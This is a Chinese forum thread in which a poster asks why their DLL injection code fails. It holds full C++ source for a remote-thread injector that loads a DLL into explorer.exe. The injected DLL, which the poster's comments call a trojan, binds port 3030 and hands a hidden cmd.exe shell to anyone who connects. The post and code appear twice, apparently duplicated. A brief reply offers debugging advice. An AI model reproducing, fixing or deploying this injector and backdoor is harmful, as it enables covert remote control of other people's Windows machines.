我想在explorer.exe调用我DLL中的代码,可是老不成功。各位大虾帮忙看看,那里出错了!
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>///////////////////////////////////////////////////////////////
BOOL EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID id;
// 打开进程令牌环
if(!OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken error.\n");
return FALSE;
}
// 获得进程本地ID
if(!LookupPrivilegeValue(NULL,name,&id) )
{
printf("LookupPrivilege error!\n");
} tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = id;
// 调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
printf("AdjustTokenPrivileges error!\n");
return FALSE;
} return TRUE;
}
//-------------------------------------------------------------
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess; if(!EnableDebugPriv(SE_DEBUG_NAME))
{
printf("Add privilege error");
return FALSE;
} // 打开远程线程
if( (hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | // 允许远程创建线程
PROCESS_VM_OPERATION | // 允许远程VM操作
PROCESS_VM_WRITE, // 允许远程VM写
FALSE, dwRemoteProcessId
)) == NULL )
{
printf("OpenProcess error!\n");
return FALSE;
} char *pszLibFileRemote;
// 使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(DllFullPath)+1,
MEM_COMMIT,
PAGE_READWRITE
);
if(pszLibFileRemote == NULL)
{
printf("VirtualAllocEx error!\n");
return FALSE;
} // 使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if( WriteProcessMemory( hRemoteProcess,
pszLibFileRemote,
(void *) DllFullPath,
lstrlen(DllFullPath)+1,
NULL
) == 0)
{
printf("WriteProcessMemory error!\n");
return FALSE;
} // 计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); if(pfnStartAddr == NULL)
{
printf("GetProcAddress error!\n");
return FALSE;
} // 通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryA的入口地址)
// 和传递的参数pszLibFileRemote(实际上是我们复制过去的木马DLL的全路径文件名)
// 在远程进程内启动我们的木马DLL.
// 启动远程线程LoadLibraryA.通过远程线程调用用户的DLL文件
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess,
NULL,
0,
pfnStartAddr,
pszLibFileRemote,
0,
NULL
)) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
} return TRUE;
}
//-------------------------------------------------------------
unsigned long GetProcID(char *pnProc)
{
BOOL bFlag;
HANDLE hnProc;
PROCESSENTRY32 pe; hnProc = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(pe);
bFlag = Process32First(hnProc,&pe);
while(bFlag)
{
if(strcmp(pnProc,pe.szExeFile) == 0)
return pe.th32ProcessID;
bFlag = Process32Next(hnProc,&pe);
} return 0;
}
//-------------------------------------------------------------
int main()
{ DWORD pnPocID; pnPocID = GetProcID("explorer.exe");/*得到进程PID*/ if(pnPocID == 0)
return 1; if(InjectDll("DLL.dll",pnPocID))
printf("\nInject OK!\n");
else
printf("\nInject Fail!\n"); return 0;}
/////////////////////////////////////////////////////////////////////
DLL的代码:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"Ws2_32")
#pragma comment(lib,"Winmm.lib")#define EXPORT extern "C" __declspec(dllexport)///////////////////////////////////////////////////////////////
//Function List://
DWORD WINAPI Entrance(LPVOID lpParam);//=============================================================
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Hello DLL", "OK", MB_OK);
Entrance(NULL);
default:
return TRUE;
}
return TRUE;
}
//-------------------------------------------------------------
DWORD WINAPI Entrance(LPVOID lpParam)
{
WSADATA ws;
SOCKET ListenFD;
int ret;
// 初始化wsa
WSAStartup(MAKEWORD(2,2),&ws);
// 建立socket
ListenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(3030);
server.sin_addr.s_addr = ADDR_ANY;
// 绑定
ret=bind(ListenFD,(sockaddr *)&server,sizeof(server));
// 监听端口3000
ret=listen(ListenFD,2);
// 如果有客来访,接收连接
int iAddrSize = sizeof(server);
SOCKET ClientFD=accept(ListenFD,(sockaddr *)&server,&iAddrSize); STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)ClientFD;
char cmdLine[] = "cmd";
PROCESS_INFORMATION ProcessInformation; // 建立控制台进程
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
// 等待使用者使用结束..
WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
// 关闭结束这一个进程..
TerminateProcess(ProcessInformation.hProcess, 0);
// 关闭这一个句柄..
CloseHandle(ProcessInformation.hProcess);
return 0;
}在本机运行上可是我用nc去连3030端口没有反应返回是端口都没有开,说明都没有调用DLL里面的代码。可是注入程序返回的是"Inject OK"成功了的。到底那里出了毛病各位达人帮忙看看。
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <string.h>///////////////////////////////////////////////////////////////
BOOL EnableDebugPriv(const char * name)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID id;
// 打开进程令牌环
if(!OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken))
{
printf("OpenProcessToken error.\n");
return FALSE;
}
// 获得进程本地ID
if(!LookupPrivilegeValue(NULL,name,&id) )
{
printf("LookupPrivilege error!\n");
} tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = id;
// 调整权限
if(!AdjustTokenPrivileges(hToken,0,&tp,sizeof(TOKEN_PRIVILEGES),NULL,NULL) )
{
printf("AdjustTokenPrivileges error!\n");
return FALSE;
} return TRUE;
}
//-------------------------------------------------------------
BOOL InjectDll(const char *DllFullPath, const DWORD dwRemoteProcessId)
{
HANDLE hRemoteProcess; if(!EnableDebugPriv(SE_DEBUG_NAME))
{
printf("Add privilege error");
return FALSE;
} // 打开远程线程
if( (hRemoteProcess = OpenProcess( PROCESS_CREATE_THREAD | // 允许远程创建线程
PROCESS_VM_OPERATION | // 允许远程VM操作
PROCESS_VM_WRITE, // 允许远程VM写
FALSE, dwRemoteProcessId
)) == NULL )
{
printf("OpenProcess error!\n");
return FALSE;
} char *pszLibFileRemote;
// 使用VirtualAllocEx函数在远程进程的内存地址空间分配DLL文件名缓冲区
pszLibFileRemote = (char *) VirtualAllocEx( hRemoteProcess,
NULL,
lstrlen(DllFullPath)+1,
MEM_COMMIT,
PAGE_READWRITE
);
if(pszLibFileRemote == NULL)
{
printf("VirtualAllocEx error!\n");
return FALSE;
} // 使用WriteProcessMemory函数将DLL的路径名复制到远程进程的内存空间
if( WriteProcessMemory( hRemoteProcess,
pszLibFileRemote,
(void *) DllFullPath,
lstrlen(DllFullPath)+1,
NULL
) == 0)
{
printf("WriteProcessMemory error!\n");
return FALSE;
} // 计算LoadLibraryA的入口地址
PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryA"); if(pfnStartAddr == NULL)
{
printf("GetProcAddress error!\n");
return FALSE;
} // 通过建立远程线程时的地址pfnStartAddr(实际上就是LoadLibraryA的入口地址)
// 和传递的参数pszLibFileRemote(实际上是我们复制过去的木马DLL的全路径文件名)
// 在远程进程内启动我们的木马DLL.
// 启动远程线程LoadLibraryA.通过远程线程调用用户的DLL文件
HANDLE hRemoteThread;
if( (hRemoteThread = CreateRemoteThread( hRemoteProcess,
NULL,
0,
pfnStartAddr,
pszLibFileRemote,
0,
NULL
)) == NULL)
{
printf("CreateRemoteThread error!\n");
return FALSE;
} return TRUE;
}
//-------------------------------------------------------------
unsigned long GetProcID(char *pnProc)
{
BOOL bFlag;
HANDLE hnProc;
PROCESSENTRY32 pe; hnProc = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize = sizeof(pe);
bFlag = Process32First(hnProc,&pe);
while(bFlag)
{
if(strcmp(pnProc,pe.szExeFile) == 0)
return pe.th32ProcessID;
bFlag = Process32Next(hnProc,&pe);
} return 0;
}
//-------------------------------------------------------------
int main()
{ DWORD pnPocID; pnPocID = GetProcID("explorer.exe");/*得到进程PID*/ if(pnPocID == 0)
return 1; if(InjectDll("DLL.dll",pnPocID))
printf("\nInject OK!\n");
else
printf("\nInject Fail!\n"); return 0;}
/////////////////////////////////////////////////////////////////////
DLL的代码:
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#pragma comment(lib,"Ws2_32")
#pragma comment(lib,"Winmm.lib")#define EXPORT extern "C" __declspec(dllexport)///////////////////////////////////////////////////////////////
//Function List://
DWORD WINAPI Entrance(LPVOID lpParam);//=============================================================
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
MessageBox(NULL, "Hello DLL", "OK", MB_OK);
Entrance(NULL);
default:
return TRUE;
}
return TRUE;
}
//-------------------------------------------------------------
DWORD WINAPI Entrance(LPVOID lpParam)
{
WSADATA ws;
SOCKET ListenFD;
int ret;
// 初始化wsa
WSAStartup(MAKEWORD(2,2),&ws);
// 建立socket
ListenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
struct sockaddr_in server;
server.sin_family = AF_INET;
server.sin_port = htons(3030);
server.sin_addr.s_addr = ADDR_ANY;
// 绑定
ret=bind(ListenFD,(sockaddr *)&server,sizeof(server));
// 监听端口3000
ret=listen(ListenFD,2);
// 如果有客来访,接收连接
int iAddrSize = sizeof(server);
SOCKET ClientFD=accept(ListenFD,(sockaddr *)&server,&iAddrSize); STARTUPINFO si;
ZeroMemory(&si,sizeof(si));
si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
si.hStdInput = si.hStdOutput = si.hStdError = (void *)ClientFD;
char cmdLine[] = "cmd";
PROCESS_INFORMATION ProcessInformation; // 建立控制台进程
ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
// 等待使用者使用结束..
WaitForSingleObject(ProcessInformation.hProcess, INFINITE);
// 关闭结束这一个进程..
TerminateProcess(ProcessInformation.hProcess, 0);
// 关闭这一个句柄..
CloseHandle(ProcessInformation.hProcess);
return 0;
}在本机运行上可是我用nc去连3030端口没有反应返回是端口都没有开,说明都没有调用DLL里面的代码。可是注入程序返回的是"Inject OK"成功了的。到底那里出了毛病各位达人帮忙看看。
可以首先自己写一个测试程序,调用你的dll里的 Entrance(NULL);,看有没有问题,
而不是马上把dll注入远程进程,
如果没有问题的话,证明你的dll没有问题了;
那应该是远程注入时出问题了